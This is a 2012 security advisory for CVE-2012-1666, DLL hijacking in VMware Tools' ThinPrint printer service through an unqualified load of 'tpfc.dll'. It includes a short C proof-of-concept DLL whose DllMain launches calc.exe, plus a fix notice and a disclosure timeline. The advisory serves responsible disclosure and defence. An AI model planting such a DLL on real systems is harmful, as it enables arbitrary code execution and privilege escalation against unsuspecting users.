VMWare Tools Binary Planting

`Security Advisory - VMWare Tools susceptible to binary planting by hijack  
=========================================================================  
Summary : VMWare Tools susceptible to binary planting  
Date : 4 September 2012  
Affected versions : Product versions prior to -  
Workstation 8.0.4  
Player 4.0.4  
Fusion 4.1.2  
View 5.1  
ESX 5.0 P03  
ESX 4.1 U3  
Not affected: ESX 4.0, ESX 3.5  
CVE reference : CVE-2012-1666  
  
Details  
================  
VMWare Tools handles many functions involved with host-guest interactivity,  
providing a richer environment for the end-user and server administrators alike.  
Part of VMWare Tools responsibilities is handling printer services through host  
and is called by a third-party acquired tool (ThinPrint).  
  
During initiation, which occurs during many steps throughout printer comm.  
negotiation, a non-existent dynamic-link library is called, resulting in an  
unqualified dynamic-link library call to 'tpfc.dll'.  
  
A user with local disk access can carefuly construct a DLL that suits the  
pattern that is being traversed by the client and implement it somewhere along  
the search path and the client will load it seamlessly.  
  
Impact  
================  
After the DLL has been implemented, an unsuspected user that will run printer  
services, for example, will cause it to load, resulting in arbitrary code  
execution under user's privilege level.  
  
This vector of attack is mainly used in a local privilege escalation scenarios,  
user credential harvesting and can be used by malware to disguise itself,  
amongst other uses.  
  
Proof of Concept  
================  
  
#include <windows.h>   
  
int hijack_poc ()   
{   
WinExec ( "calc.exe" , SW_NORMAL );  
return 0 ;   
}   
  
BOOL WINAPI DllMain   
( HINSTANCE hinstDLL ,   
DWORD dwReason ,  
LPVOID lpvReserved )   
{   
hijack_poc () ;  
return 0 ;  
}   
  
Solution  
================  
Official patches were delivered by vendor and can be fetched from www.vmware.com  
  
Credits  
================  
The issue was responsibly reported by Moshe Zioni from Comsec Global Consulting.  
  
Timeline  
=================  
4 September 2012  
Security advisory released by Comsec Consulting  
31 August 2012  
Vendor finished on deploying fixes to products, release notes published  
13 March 2012  
Vendor started to implement fixes to products  
14 February 2012  
First response from vendor  
13 February 2012  
Bug reported by Moshe Zioni from Comsec Global Consulting  
to VMWare and third-party printer driver developers in sync  
  
References  
=================  
VMWare  
http://www.vmware.com  
Release notes  
https://www.vmware.com/support/vsphere4/doc/vsp_esxi41_u3_rel_notes.html#resolvedissuessecurity  
  
Comsec Global Consulting  
http://www.comsecglobal.com/  
`